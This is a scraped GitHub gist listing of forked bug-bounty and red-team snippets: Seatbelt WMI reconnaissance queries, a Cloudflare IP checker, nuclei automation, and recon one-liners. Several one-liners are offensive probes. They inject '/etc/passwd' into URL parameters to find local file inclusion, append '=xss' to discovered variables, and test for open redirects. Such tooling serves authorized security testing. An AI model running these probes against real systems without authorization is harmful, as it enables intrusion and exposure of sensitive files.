- The .NET Runtime Event Provider requires setting COMPLUS_ETWEnabled=1 in your process' environment.
- CLRConfig will look for configurations in the following places in the following order:
- Look at environment variables (prepending COMPlus_ to the name)
- Look at the framework registry keys (
HKCU\Software\Microsoft\.NETFramework - Look at the framework registry keys
HKLM\Software\Microsoft\.NETFramework)
- These can be set in the following ways:
- Setting the environment variable COMPlus_:
- Windows
sasqwatch
/ seatbelt_wmi_query_strings_basic_exploration.txt
Created
August 19, 2020 05:58
— forked from Cyb3rWard0g/seatbelt_wmi_query_strings_basic_exploration.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SELECT System.ItemPathDisplay,System.FileOwner,System.Size,System.DateCreated,System.DateAccessed,System.Search.Autosummary FROM SystemIndex WHERE Contains(*, '""*{0}*""') AND SCOPE = '{1}' AND (System.FileExtension = '.txt' OR System.FileExtension = '.doc' OR System.FileExtension = '.docx' OR System.FileExtension = '.ppt' OR System.FileExtension = '.pptx' OR System.FileExtension = '.xls' OR System.FileExtension = '.xlsx' OR System.FileExtension = '.ps1' OR System.FileExtension = '.vbs' OR System.FileExtension = '.config' OR System.FileExtension = '.ini')" | |
| SELECT * FROM win32_networkconnection" | |
| Select * from Win32_ComputerSystem" | |
| SELECT * FROM Win32_DeviceGuard" | |
| SELECT * FROM win32_service" | |
| SELECT * FROM AntiVirusProduct" | |
| SELECT * FROM MSFT_DNSClientCache" | |
| SELECT ProcessId, ExecutablePath, CommandLine FROM Win32_Process" | |
| SELECT * FROM Win32_Process" | |
| SELECT * FROM Win32_Process WHERE SessionID != 0" |
sasqwatch
/ is_cloudflare.py
Created
August 19, 2020 05:57
— forked from dwisiswant0/is_cloudflare.py
Check if an IP is owned by Cloudflare
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/env python | |
| # Credits goes to @sw33tLie | |
| from ipaddress import ip_network, ip_address | |
| cidrs = ["173.245.48.0/20","103.21.244.0/22","103.22.200.0/22","103.31.4.0/22","141.101.64.0/18","108.162.192.0/18","190.93.240.0/20","188.114.96.0/20","197.234.240.0/22","198.41.128.0/17","162.158.0.0/15","104.16.0.0/12","172.64.0.0/13","131.0.72.0/22"] | |
| def is_cloudflare(ip): | |
| for cidr in cidrs: | |
| net = ip_network(cidr) |
sasqwatch
/ find js file one liner
Created
August 18, 2020 04:57
— forked from dwisiswant0/find js file one liner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done |
sasqwatch
/ nuclear.sh
Created
August 18, 2020 04:57
— forked from dwisiswant0/nucleir.sh
Automate nuclei
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| nucleir() { | |
| local TPL="$HOME/Documents/nuclei-templates" | |
| [[ -z "${1}" ]] && { echo "-target/-l ?"; return; } | |
| [[ -z "${2}" ]] && { echo "Input target?"; return; } | |
| for i in `ls -1d ${TPL}/*/`; do | |
| if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then | |
| nuclei $1 $2 -t ${i} -o "$(basename $2)_nuclei-$(basename $i).txt" | |
| fi |
sasqwatch
/ nuclear.sh
Created
August 18, 2020 04:57
— forked from dwisiswant0/nucleir.sh
Automate nuclei
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| nucleir() { | |
| local TPL="$HOME/Documents/nuclei-templates" | |
| [[ -z "${1}" ]] && { echo "-target/-l ?"; return; } | |
| [[ -z "${2}" ]] && { echo "Input target?"; return; } | |
| for i in `ls -1d ${TPL}/*/`; do | |
| if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then | |
| nuclei $1 $2 -t ${i} -o "$(basename $2)_nuclei-$(basename $i).txt" | |
| fi |
sasqwatch
/ bash_aliases.sh
Created
August 18, 2020 04:57
— forked from dwisiswant0/bash_aliases.sh
One-liner to get Open-redirect & LFI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| lfi() { | |
| gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"' | |
| } | |
| open-redirect() { | |
| local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"' | |
| } |
sasqwatch
/ COMPlus_ETWEnabled_detection_notes.md
Created
August 18, 2020 04:52
— forked from Cyb3rWard0g/COMPlus_ETWEnabled_detection_notes.md
sasqwatch
/ oopen.sh
Created
August 18, 2020 04:25
— forked from gwen001/oopen.sh
oneliner to open a bunch of hosts/urls
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| firefox `cat urls.txt | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}' | |
| firefox `cat urls.txt | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}' | tr "\n" " "` | |
| chromium-browser `cat urls.txt | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}' | |
| chromium-browser `cat urls.txt | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}' | tr "\n" " "` | |
| function oopen() { | |
| firefox `cat $1 | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}' | |
| } |
sasqwatch
/ oasn.sh
Created
August 18, 2020 04:25
— forked from gwen001/oasn.sh
oneliner to retrieve AS Numbers of a company
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (ls /tmp/GeoLite2-ASN-CSV.zip||wget --quiet -P /tmp "https://geolite.maxmind.com/download/geoip/database/GeoLite2-ASN-CSV.zip") 2>&1|grep X; unzip -c /tmp/GeoLite2-ASN-CSV.zip|grep -i airbnb|cut -d ',' -f 2|sort -fu | |
| amass intel -org paypal | cut -d ',' -f 1 | |
| output: | |
| 133850 | |
| 137437 | |
| 206695 | |
| 206704 |
sasqwatch
/ otestu.sh
Created
August 18, 2020 04:25
— forked from gwen001/otestu.sh
onliner to quickly test some urls using curl
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat plainurls.txt | while read u;do echo "$(printf '%-100s' "$u")-> $((curl -I -s -m 5 -k "$u"||echo KO)|head -n 1 -)"; done | |
| From a json file: | |
| cat waybackurls.json|jq -r '.[]'|grep 'http'|cut -d '"' -f 2 | while read u;do echo "$(printf '%-100s' "$u")-> $((curl -I -s -m 5 -k "$u"||echo KO)|head -n 1 -)"; done | |
| Using parallel to speed up the process: | |
| cat plainurls.txt | parallel -j 20 -I# 'echo "$(printf "%-100s" "#") -> $((curl -I -s -m 5 -k "#"||echo KO)|head -n 1 -)"' | |
| function otestu { | |
| cat $1 | parallel -j 20 -I# 'echo "$(printf "%-100s" "#") -> $((curl -I -s -m 5 -k "#"||echo KO)|head -n 1 -)"' |